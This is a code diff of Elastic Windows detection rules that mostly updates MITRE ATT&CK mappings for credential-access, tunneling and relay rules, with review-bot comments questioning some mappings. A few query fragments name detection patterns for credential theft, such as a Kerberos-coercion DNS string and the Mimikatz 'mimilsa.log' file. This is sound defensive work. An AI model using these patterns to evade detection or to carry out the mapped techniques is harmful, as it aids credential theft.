@@ -108,14 +108,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/windows/command_and_control_tunnel_cloudflared.toml b/rules/windows/command_and_control_tunnel_cloudflared.toml index 520433f13b9..eb025de67fa 100644 --- a/rules/windows/command_and_control_tunnel_cloudflared.toml +++ b/rules/windows/command_and_control_tunnel_cloudflared.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,6 +80,17 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + +[[rule.threat.technique.subtechnique]] +id = "T1090.002" +name = "External Proxy" +reference = "https://attack.mitre.org/techniques/T1090/002/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" 
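Review bot: The new Exfiltration block (`T1567`, Exfiltration Over Web Service) for the curl tool-transfer rule only holds if the query matches upload-style invocations; the hunk header shows just `process where host.os.type == "windows" and event.type == "start" and`, so this is inferred, but a rule named tool_transfer that keys on download behaviour would attribute Exfiltration to every hit and skew tactic-level reporting. If uploads are covered, a one-line rationale in the rule would help the next reviewer; if not, dropping `T1567` leaves `T1105` and the new `T1071.001` as the accurate mapping. The rest of the `[rule]` table is outside the hunk.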
diff --git a/rules/windows/command_and_control_tunnel_yuze.toml b/rules/windows/command_and_control_tunnel_yuze.toml index a3a6314cc2e..cd38623397a 100644 --- a/rules/windows/command_and_control_tunnel_yuze.toml +++ b/rules/windows/command_and_control_tunnel_yuze.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,6 +86,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" @@ -95,3 +101,21 @@ reference = "https://attack.mitre.org/techniques/T1572/" id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/command_and_control_velociraptor_shell_execution.toml b/rules/windows/command_and_control_velociraptor_shell_execution.toml index e3a239e9797..8801cffc6d1 100644 --- a/rules/windows/command_and_control_velociraptor_shell_execution.toml +++ b/rules/windows/command_and_control_velociraptor_shell_execution.toml 
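Review bot: The yuze tunnel rule gains only the parent `T1090` (Proxy), whereas the sibling cloudflared rule in the preceding section gains both `T1090` and `T1090.002` (External Proxy); both appear to detect an externally hosted tunnel endpoint, so the subtechnique level should probably match. If the omission is deliberate, the reason is not recoverable from the hunk. The rest of the `[rule]` table is outside the hunk.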
@@ -2,7 +2,7 @@ creation_date = "2026/03/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -90,10 +90,12 @@ process where host.os.type == "windows" and event.type == "start" and process.co [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" + [[rule.threat.technique.subtechnique]] id = "T1219.002" name = "Remote Desktop Software" @@ -104,3 +106,43 @@ id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/credential_access_browsers_unusual_parent.toml b/rules/windows/credential_access_browsers_unusual_parent.toml index 7ba940e2c6d..b02f7744825 100644 
--- a/rules/windows/credential_access_browsers_unusual_parent.toml +++ b/rules/windows/credential_access_browsers_unusual_parent.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/27" integration = ["windows", "endpoint", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/27" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -108,10 +108,17 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1539" +name = "Steal Web Session Cookie" +reference = "https://attack.mitre.org/techniques/T1539/" + [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" + [[rule.threat.technique.subtechnique]] id = "T1555.003" name = "Credentials from Web Browsers" @@ -122,4 +129,15 @@ id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1185" +name = "Browser Session Hijacking" +reference = "https://attack.mitre.org/techniques/T1185/" +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/windows/credential_access_dcsync_user_backdoor.toml b/rules/windows/credential_access_dcsync_user_backdoor.toml index e220648179d..4c78e191a4a 100644 --- a/rules/windows/credential_access_dcsync_user_backdoor.toml +++ b/rules/windows/credential_access_dcsync_user_backdoor.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/10" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -106,19 +106,31 @@ event.code:"5136" and host.os.type:"windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.006" name = "DCSync" reference = "https://attack.mitre.org/techniques/T1003/006/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/credential_access_disable_kerberos_preauth.toml b/rules/windows/credential_access_disable_kerberos_preauth.toml index f69365d6a48..f71fe2879f1 100644 --- a/rules/windows/credential_access_disable_kerberos_preauth.toml +++ b/rules/windows/credential_access_disable_kerberos_preauth.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/24" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -91,48 +91,62 @@ any where host.os.type == "windows" and event.code == "4738" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" + [[rule.threat.technique.subtechnique]] id = "T1558.004" name = "AS-REP Roasting" reference = "https://attack.mitre.org/techniques/T1558/004/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.002" name = "Domain Accounts" reference = "https://attack.mitre.org/techniques/T1078/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/credential_access_dnsnode_creation.toml b/rules/windows/credential_access_dnsnode_creation.toml index 4dd21727dec..4f3271ced6e 100644 --- a/rules/windows/credential_access_dnsnode_creation.toml +++ b/rules/windows/credential_access_dnsnode_creation.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/03/26" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -104,14 +104,18 @@ any where host.os.type == "windows" and event.code == "5137" and winlog.event_da [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" +[[rule.threat.technique.subtechnique]] +id = "T1557.001" +name = "LLMNR/NBT-NS Poisoning and SMB Relay" +reference = "https://attack.mitre.org/techniques/T1557/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_dollar_account_relay_kerberos.toml b/rules/windows/credential_access_dollar_account_relay_kerberos.toml index 0a76152c2fc..0566e9d8819 100644 --- a/rules/windows/credential_access_dollar_account_relay_kerberos.toml +++ b/rules/windows/credential_access_dollar_account_relay_kerberos.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/18" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/10/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -106,6 +106,7 @@ sequence by winlog.computer_name, source.ip with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1187" name = "Forced Authentication" 
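Review bot: Mapping an AD DNS node creation rule to `T1557.001` (LLMNR/NBT-NS Poisoning and SMB Relay) is a stretch: that subtechnique describes answering LLMNR/NBT-NS broadcasts, whereas ADIDNS record abuse is a different poisoning vector for which the parent `T1557` the rule already carries is the closer match. The visible query prefix `event.code == "5137"` suggests an object-creation audit rule, which supports keeping the mapping at the parent level, though the full query is outside the hunk.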
@@ -115,15 +116,26 @@ reference = "https://attack.mitre.org/techniques/T1187/" id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" + [[rule.threat.technique.subtechnique]] id = "T1557.001" name = "LLMNR/NBT-NS Poisoning and SMB Relay" reference = "https://attack.mitre.org/techniques/T1557/001/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml b/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml index 25f74db6270..1b26420a8b4 100644 --- a/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml +++ b/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/13" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -57,24 +57,33 @@ file where host.os.type == "windows" and event.type != "deletion" and file.name [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" + +[[rule.threat.technique.subtechnique]] +id = "T1003.004" +name = "LSA Secrets" +reference = "https://attack.mitre.org/techniques/T1003/004/" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.004" name = "Private Keys" reference = "https://attack.mitre.org/techniques/T1552/004/" - [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_iis_connectionstrings_dumping.toml b/rules/windows/credential_access_iis_connectionstrings_dumping.toml index ad8287b9688..025d8529f50 100644 --- a/rules/windows/credential_access_iis_connectionstrings_dumping.toml +++ b/rules/windows/credential_access_iis_connectionstrings_dumping.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -95,14 +95,23 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_imageload_azureadconnectauthsvc.toml b/rules/windows/credential_access_imageload_azureadconnectauthsvc.toml index cba25263080..24bfc0ac87f 100644 --- a/rules/windows/credential_access_imageload_azureadconnectauthsvc.toml +++ b/rules/windows/credential_access_imageload_azureadconnectauthsvc.toml @@ -2,7 +2,7 @@ creation_date = "2024/10/14" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Matteo Potito Giorgio"] 
@@ -99,14 +99,31 @@ not (?dll.code_signature.trusted == true or file.code_signature.status == "Valid [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.001" +name = "DLL" +reference = "https://attack.mitre.org/techniques/T1574/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/credential_access_kerberoasting_unusual_process.toml b/rules/windows/credential_access_kerberoasting_unusual_process.toml index 7f3932dcef5..7a30322d950 100644 --- a/rules/windows/credential_access_kerberoasting_unusual_process.toml +++ b/rules/windows/credential_access_kerberoasting_unusual_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/02" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] 
@@ -168,14 +168,31 @@ network where host.os.type == "windows" and event.type == "start" and network.di [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.003" +name = "Pass the Ticket" +reference = "https://attack.mitre.org/techniques/T1550/003/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/credential_access_kerberos_coerce.toml b/rules/windows/credential_access_kerberos_coerce.toml index 0ddf57939c2..8c9692a2d05 100644 --- a/rules/windows/credential_access_kerberos_coerce.toml +++ b/rules/windows/credential_access_kerberos_coerce.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/14" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
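Review bot: The new Lateral Movement block attributes `T1550.003` (Pass the Ticket) to the kerberoasting-by-unusual-process rule, but that subtechnique describes using a stolen ticket to authenticate elsewhere, while service-ticket requests from an unexpected process are evidence of the harvesting step the rule already maps to `T1558`. Only the query prefix `network where host.os.type == "windows" and event.type == "start" and network.di` is visible, so if the query also catches ticket use this stands; otherwise the block attributes Lateral Movement to every hit. The `[rule]` table and the rest of the query are outside the hunk.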
@@ -103,24 +103,23 @@ host.os.type:"windows" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1187" +name = "Forced Authentication" +reference = "https://attack.mitre.org/techniques/T1187/" + [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" + [[rule.threat.technique.subtechnique]] id = "T1557.001" name = "LLMNR/NBT-NS Poisoning and SMB Relay" reference = "https://attack.mitre.org/techniques/T1557/001/" - -[[rule.threat.technique]] -id = "T1187" -name = "Forced Authentication" -reference = "https://attack.mitre.org/techniques/T1187/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_kerberos_coerce_dns.toml b/rules/windows/credential_access_kerberos_coerce_dns.toml index 0269e12bbd3..e9750ecd5e8 100644 --- a/rules/windows/credential_access_kerberos_coerce_dns.toml +++ b/rules/windows/credential_access_kerberos_coerce_dns.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/14" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/06/14" +updated_date = "2026/03/24" [transform] [[transform.investigate]] 
@@ -95,24 +95,23 @@ network where host.os.type == "windows" and dns.question.name : "*UWhRC*BAAAA*" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1187" +name = "Forced Authentication" +reference = "https://attack.mitre.org/techniques/T1187/" + [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" + [[rule.threat.technique.subtechnique]] id = "T1557.001" name = "LLMNR/NBT-NS Poisoning and SMB Relay" reference = "https://attack.mitre.org/techniques/T1557/001/" - -[[rule.threat.technique]] -id = "T1187" -name = "Forced Authentication" -reference = "https://attack.mitre.org/techniques/T1187/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/windows/credential_access_ldap_attributes.toml b/rules/windows/credential_access_ldap_attributes.toml index 9cb9ff680a5..d076bed63ce 100644 --- a/rules/windows/credential_access_ldap_attributes.toml +++ b/rules/windows/credential_access_ldap_attributes.toml @@ -2,7 +2,7 @@ creation_date = "2022/11/09" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -118,6 +118,7 @@ any where host.os.type == "windows" and event.code == "4662" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" 
@@ -127,32 +128,49 @@ reference = "https://attack.mitre.org/techniques/T1003/" id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.004" name = "Private Keys" reference = "https://attack.mitre.org/techniques/T1552/004/" - +[[rule.threat.technique]] +id = "T1649" +name = "Steal or Forge Authentication Certificates" +reference = "https://attack.mitre.org/techniques/T1649/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.002" name = "Domain Accounts" reference = "https://attack.mitre.org/techniques/T1078/002/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/windows/credential_access_lsass_loaded_susp_dll.toml b/rules/windows/credential_access_lsass_loaded_susp_dll.toml index cb444a5b057..4f25fe6c2d1 100644 --- a/rules/windows/credential_access_lsass_loaded_susp_dll.toml +++ b/rules/windows/credential_access_lsass_loaded_susp_dll.toml @@ -2,7 +2,7 @@ creation_date = "2022/12/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -142,19 +142,36 @@ The Local Security Authority Subsystem Service (LSASS) is crucial for managing s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" reference = "https://attack.mitre.org/techniques/T1003/001/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.005" +name = "Security Support Provider" +reference = "https://attack.mitre.org/techniques/T1547/005/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/credential_access_machine_account_smb_relay.toml b/rules/windows/credential_access_machine_account_smb_relay.toml index 74eb4c912b9..4fddce0cab7 100644 --- a/rules/windows/credential_access_machine_account_smb_relay.toml +++ b/rules/windows/credential_access_machine_account_smb_relay.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/16" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -82,6 +82,7 @@ file where host.os.type == "windows" and event.code == "5145" and endswith(user. [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1187" name = "Forced Authentication" 
@@ -91,15 +92,31 @@ reference = "https://attack.mitre.org/techniques/T1187/" id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" + [[rule.threat.technique.subtechnique]] id = "T1557.001" name = "LLMNR/NBT-NS Poisoning and SMB Relay" reference = "https://attack.mitre.org/techniques/T1557/001/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.002" +name = "SMB/Windows Admin Shares" +reference = "https://attack.mitre.org/techniques/T1021/002/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/credential_access_mimikatz_memssp_default_logs.toml b/rules/windows/credential_access_mimikatz_memssp_default_logs.toml index cbc58475eaa..8b7aa352cb7 100644 --- a/rules/windows/credential_access_mimikatz_memssp_default_logs.toml +++ b/rules/windows/credential_access_mimikatz_memssp_default_logs.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/31" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -96,14 +96,36 @@ file where host.os.type == "windows" and file.name : "mimilsa.log" and process.n [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.005" +name = "Security Support Provider" +reference = "https://attack.mitre.org/techniques/T1547/005/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/credential_access_mimikatz_powershell_module.toml b/rules/windows/credential_access_mimikatz_powershell_module.toml index 19d4c6879de..6366fd23398 100644 --- a/rules/windows/credential_access_mimikatz_powershell_module.toml +++ b/rules/windows/credential_access_mimikatz_powershell_module.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -135,22 +135,44 @@ powershell.file.script_block_text:( [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" reference = "https://attack.mitre.org/techniques/T1003/001/" - +[[rule.threat.technique]] +id = "T1649" +name = "Steal or Forge Authentication Certificates" +reference = "https://attack.mitre.org/techniques/T1649/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_mod_wdigest_security_provider.toml b/rules/windows/credential_access_mod_wdigest_security_provider.toml index d54be2d33fe..03fe548545a 100644 --- a/rules/windows/credential_access_mod_wdigest_security_provider.toml +++ b/rules/windows/credential_access_mod_wdigest_security_provider.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/19" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
